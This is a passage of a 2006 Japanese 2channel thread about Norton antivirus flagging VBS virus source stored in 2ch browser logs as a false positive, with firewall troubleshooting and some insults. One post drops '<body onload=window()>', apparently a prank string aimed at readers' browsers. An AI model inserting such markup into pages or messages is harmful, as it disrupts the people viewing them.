ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。
441: 2006/02/24(金) 23:01:38 ID:??? AA×
>>438
442: 2006/02/24(金) 23:29:37 ID:/hbjD2Uq(2/2)調 AAS
>>440
ありがとうございます
443(2): 2006/02/28(火) 01:33:27 ID:icpaH3Er(1)調 AAS
JANE DOE STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に
ノートンが「xxxxxが1つ以上の認識されないモジュールを使ってインターネットにアクセスしようとしています」
と出て、許可にしないとプログラム実行されず、何も出来ないのですが、これはウィルスに感染してるのでしょうか?
スキャンしても検出されず、過去ログ検索対象外にしても出続けます。
知恵をください。お願いします。
444(2): 2006/02/28(火) 09:18:46 ID:GU2WNsCd(1)調 AAS
>>443
VBSを踏んだってのはソースが貼り付けてあるスレを開いたってこと?
それともVBSが実行されたってこと?
445(2): 443 2006/02/28(火) 11:01:38 ID:??? AAS
>>444
スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。
446(2): 2006/03/01(水) 15:04:09 ID:??? AAS
>>445
リストから全部削除しろ バカ
WindowsUpdateしていたら何にも感染などしねえわ
447: 2006/03/01(水) 21:25:32 ID:??? AAS
>>446
> WindowsUpdateしていたら何にも感染などしねえわ
それはどうかな?
448(2): 2006/03/02(木) 19:57:05 ID:??? AAS
>>371で板の見れない問題は解決したのですが、これは危険なのですか?
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか?
449(1): 2006/03/02(木) 21:46:27 ID:??? AAS
>>448
202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。
450: 2006/03/02(木) 21:49:48 ID:??? AAS
>>446
Microsft Update 入れてください(><)
451: 448 2006/03/03(金) 18:37:00 ID:??? AAS
>>449
サンクス
452(1): 2006/03/04(土) 05:32:46 ID:??? AAS
avastがvbsウィルスのソースに誤反応
ってスレも立ってほしいなあ
453: 2006/03/13(月) 18:59:55 ID:V3zGYCXt(1)調 AAS
u
454: 2006/03/13(月) 21:10:07 ID:??? AAS
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
2chスレ:win
511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー〜を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
455(1): 2006/03/21(火) 09:43:56 ID:xHVuEeZu(1)調 AAS
u
456(1): 2006/03/23(木) 14:11:32 ID:bCv+njJc(1/2)調 AAS
キタ━━ <body onload=window()> ━━━ !!
457: 2006/03/23(木) 14:12:39 ID:??? AAS
>>456
さっさと消えろ バカ
458: 2006/03/23(木) 14:16:47 ID:bCv+njJc(2/2)調 AAS
即反応かよ
上下前次1-新書関写板覧索設栞歴
あと 544 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ
ぬこの手 ぬこTOP 0.138s*